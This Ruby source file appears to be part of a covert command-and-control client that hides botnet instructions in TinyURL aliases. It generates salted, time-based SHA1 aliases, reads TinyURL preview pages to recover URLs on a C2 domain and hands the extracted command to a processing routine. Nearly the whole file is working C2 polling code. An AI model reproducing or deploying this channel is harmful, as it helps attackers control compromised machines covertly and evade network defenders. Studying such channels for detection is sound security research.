require 'openssl'

# can't use constant as it gets redeclared when the require is done and so causes a warning
@dynamic_file_name="tinyurl"

# Also configure the list of salts below, make sure they match the ones in the command file
def gen_aliases verbose
	salts = [
		"robin",
		"wood",
		"digininja"
	];

	aliases = []

	time = Time.new
	puts "Current mins is: " + time.strftime("%M").to_s
	mins_tens = time.strftime("%M").to_s[0,1].to_i
	next_ten = ((mins_tens+1).modulo 6) * 10
	puts "Round up to next 10 is: " + next_ten.to_s 

	# Y m d h:i0
	time_next_10 = Time.utc(time.year,time.month,time.day,time.hour,next_ten,0)

	puts time_next_10

	salts.each { |salt|
		aliasx = Digest::SHA1.hexdigest(time_next_10.to_s + salt).slice(0,10)
		aliases << aliasx
	}

	if verbose
		puts "The following aliases will be tried: "
		puts aliases
	end

	return aliases
end

def shorten(url, aliasx, verbose=false)
	site="tinyurl.com"
	page="/create.php"

	Net::HTTP.start(site, 80) { |http|
		response = http.post(page, "url=#{url}&alias=#{aliasx}")
 
		if response.code == "200"
			#puts response.read_body
			uris=URI.extract(response.read_body)
			if uris.length > 0
				preview_uris=uris.grep(/preview\.tinyurl\.com/)
				if preview_uris.length > 1
					if verbose
						puts "Preview command is " + preview_uris[0]
					end
					new_alias=preview_uris[0].gsub(/http:\/\/preview\.tinyurl\.com\//, "")
					return new_alias==aliasx
				else
					if verbose
						puts "Preview URI not found in response"
					end
				end
			else
				if verbose
					puts "No URIs found in response"
				end
			end
		else
			if verbose
				puts "Error code " + response.code + " returned from tinyurl"
			end
		end
		return false
	}
end

def read_url(aliasx, verbose=false)
	site="preview.tinyurl.com"
	page= "/"+aliasx

	if verbose
		puts "TinyURL: " + site + page
	end

	Net::HTTP.start(site, 80) { |http|
		response = http.get(page)
 
		if response.code == "200"
	#		puts response.read_body
			redir=response.read_body.grep(/redirecturl/)

			# Can't use URI.extract as that fails when there is a space in the url
			if redir.length == 1
				if /.*href="(.*)".*/.match(redir[0])
					return $1
				else
					if verbose
						puts "Failed to find URL in HTML output"
					end
					return false
				end
			else
				#	Too verbose!
				#	if verbose
				#		puts "Failed to find mention of 'redirecturl' in HTML returned from tinyurl.com"
				#	end
			end
		else
			if verbose
				puts "Error code " + response.code + " returned from tinyurl"
			end
		end
		return false
	}
end

@already_seen=[]

# Search for commands and act on them
def get_process_commands(verbose)
	# This is the site the command is hidden on
	base_site = "http://kreiosc2.com"

	aliases = gen_aliases verbose

	aliases.each { |aliasx|
		url=read_url(aliasx, verbose)

		if url==false
			puts "command not found"
		else
			if @already_seen.index aliasx
				if verbose
					puts "URL already checked, ignoring"
				end
			else
				@already_seen << aliasx
				if verbose
					puts "URL found: " + url
				end
				if /#{base_site}\/([0-9]*)\/\?(.*)/.match(url)
					timestamp = Time.at $1.to_i
					command = $2

					if @latest_read == nil or timestamp > @latest_read
						@latest_read=timestamp

						if verbose
							puts "Command found: " + command
						end
						process_message(command, verbose)
						return true
					else
						if verbose
							puts "Command already seen, ignoring"
						end
					end
				else
					if verbose
						puts "No command found in url"
					end
				end
			end
		end
	}

	if verbose
		puts "No command found"
	end
end
